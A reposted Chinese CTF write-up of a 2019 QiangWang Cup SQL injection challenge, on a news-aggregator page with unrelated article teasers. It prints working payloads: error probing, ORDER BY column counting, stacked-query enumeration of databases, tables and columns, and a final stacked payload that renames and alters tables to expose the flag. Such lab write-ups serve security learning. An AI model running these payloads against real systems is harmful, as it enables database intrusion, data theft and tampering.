首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2025-12-08 15:09:41
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
王者榮耀阿轲和蘭陵王的對決
王者榮耀阿轲和蘭陵王的對決
又是一局新的對戰,一波團戰又開始了,殘血的阿轲草叢裡暗中觀察準備來一波強勢的五殺收割!隻聽見戰場上呐喊:别的打輸出啊!先切後排啊!混戰過後,花木蘭受了一些傷先帶着隊伍撤了,說道:哎,這樣打聽團,好像對面比較有優勢啊!這撤退的時候,花木蘭一...
2025-12-08
植發毛囊免費檢測
植發毛囊免費檢測
植發毛囊免費檢測?劉女士系北京某大學的在讀研究生,2017年在北京花費4.3萬元做了發際線植發項目,2020年暑假期間回到西安,打算做發際線脫毛,讓再次生長的前額毛發更加自然某日,其看到某醫療美容公司的發際線激光脫毛項目僅38元,便進行了團...
2025-12-08
深基坑支護結構與邊坡防護中篇
深基坑支護結構與邊坡防護中篇
1、基坑(溝槽)開挖專項方案中的溝槽開挖工藝現場實際開挖作法:未分層放坡開挖;未設置密排鋼闆樁;無鋼闆樁的橫向支撐。2、機械開挖安全注意事項(1)溝槽開挖時應充分考慮施工工作面,必要時分台階開挖或支護開挖。(2)挖土機施工時,任何人不得在作...
2025-12-08
北方冬日的溫暖
北方冬日的溫暖
北方的冬天,最顯著的特點是寒冷的氣候,雪花飄舞的冰天雪地。其中的若幹瞬間和場景,是生活在南方的人們,難以領略到的。作為攝影人,每當下雪的時候,便背上相機,行進在廣袤的原野,或者是城市的大街小巷,拍下山舞銀蛇,原馳蠟象的美麗風景,或者是雪天裡...
2025-12-08
遠程奔襲一場生命救援戰
遠程奔襲一場生命救援戰
21日,東方航空公司MU5735航班在廣西梧州市藤縣埌南鎮莫埌村墜毀,一場緊急救援迅即展開。事發當晚,記者一行到達莫埌村,應急指揮部就設在離村口不遠的黨群服務中心,在應急指揮部附近,絡繹不絕的摩托車正馱着人和物資穿梭在村子與事發地之間,這支...
2025-12-08
Copyright 2023-2025 - www.tftnews.com All Rights Reserved